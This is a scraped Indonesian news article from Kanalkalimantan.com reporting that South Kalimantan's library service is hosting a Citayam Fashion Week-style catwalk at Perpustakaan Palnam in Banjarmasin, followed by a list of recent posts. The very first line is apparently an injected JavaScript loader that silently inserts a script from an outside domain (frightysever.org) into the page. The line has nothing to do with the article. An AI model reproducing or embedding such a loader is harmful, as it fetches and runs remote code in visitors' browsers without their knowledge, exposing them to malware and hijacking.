(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Dispersip Kalsel

‘Virus’ Citayam Fashion Week Menyebar Hingga ke Perpustakaan Palnam


KANALKALIMANTAN.COM, BANJARMASIN – ‘Virus’ Citayam Fashion Week ikut menjangkiti Dinas Perpustakaan dan Kearsipan (Dispersip) Provinsi Kalimantan Selatan (Kalsel).

Anak muda yang sedang tertular virus Citayam Fashion Week diberikan fasilitas berlenggang lenggok di lingkungan Perpustakaan Palnam.

Fasilitas dari Dispersip Kalsel dijadikan ajang unjuk bakat dan kreativitas di taman baca Perpustakaan Palnam, Jalan A Yani Kilometer 6 Banjarmasin.

 

 

Baca juga: Angkutan Pelajar Gratis Banjarbaru Dihentikan, Uang BBM Cuma 7 Bulan

Kepala Dispersip Kalsel Dra Hj Nurliani Dardie mengatakan, gelaran ini merupakan bentuk dukungan Pemprov Kalsel melalui Dispersip dalam mewadahi masyarakat dan anak muda dalam berekspresi dan berkreasi.

Nurliani mengaku siap mengadopsi ajang para pemuda untuk memamerkan busana di jalanan kota tersebut untuk menjalankan program transformasi perpustakaan berbasis inklusi sosial.

“Karena memang perpustakaan saat ini bukan hanya tempat pinjam dan baca buku, tapi juga tempat berkumpul komunitas mengembangkan dan mengaktualisasikan diri,” kata Nurliani, Sabtu (30/7/2022).

Anak muda yang sedang tertular virus Citayam Fashion Week diberikan fasilitas berlenggang lenggok di lingkungan Perpustakaan Palnam. Foto: dispersipkalsel

“Kita memiliki fasilitas yang cukup memadai, tempat parkir luas, dijamin tidak mengganggu lalu lintas. Ini juga bukan hanya untuk anak muda, semua usia, tidak membedakan jenis kelamin, status sosial atau profesi, dan lainnya,” tambahnya.

Sementara untuk promosi, pihaknya juga menyiapkan media publikasi melalui media sosial, dan tayangan langsung di videotron.

“Kalau itu memang kita perlukan, akan kita atur, agar juga dapat disaksikan khalayak ramai,” bebernya.

Baca juga: Gubernur Sahbirin Buka Konferensi Provinsi PWI Kalsel 2022

Pihaknyapun telah menyiapkan arena yang di cet dengan warna hitam putih, layaknya zebra cross atau tempat penyeberangan jalan ala Citayam Fashion Week yang lagi booming.

“Saat kita coba dengan iringan musik, aksi para pegawai Dispersip Kalsel tidak kalah piawai, dan terasa meriah,” pungkas bunda Nunung.

Pihaknyapun mengundang anak muda Banua untuk menujukan bakat dan kreatifitasnya, di taman baca perpustakaan palnam, Jalan A Yani Kilomiter 6 Banjarmasin yang buka setiap hari. (Kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Risa

Recent Posts

Lomba Mancing Ikan di Sungai Kemuning Meriahkan HUT ke-17 Kecamatan Banjarbaru Selatan

KANALKALIMANTAN.COM, BANJARBARU - Warga Kecamatan Banjarbaru Selatan antusias memeriahkan lomba memancing ikan yang digelar di… Read More

24 menit ago

Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

KANALKALIMANTAN.COM, BANJARBARU – Srikandi PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B)… Read More

1 jam ago

Bupati dan Wabup Banjar Hadiri Haul Ke-86 Datu Kasyful Anwar

KANALKALIMANTAN.COM, MARTAPURA - Ribuan orang memadati area kubah tempat dilaksanakannya haul ke-86 Tuan Guru KH… Read More

6 jam ago

Lelaki di Banjarmasin Habisi Kakak Ipar, Jasad Dibuang ke Wilayah Kintap

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin mengungkap kasus pembunuhan yang… Read More

6 jam ago

Tingkatkan Capaian Akses Layanan Air Limbah dan Air Minum, Dinas PUPR Kalsel Gelar Workshop

KANALKALIMANTAN.COM, BANJARBARU - Workshop Implementasi Jastrada Air Minum Provinsi Kalsel tahun 2024 di Banjarmasin digelar… Read More

23 jam ago

Ikuti Festival Tunas Bahasa Ibu Nasional di jakarta, Murid SDN Indrasari 2 Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Murid kelas 5 SDN Indrasari 2 Martapura, M Royan bersama guru dan… Read More

24 jam ago

This website uses cookies.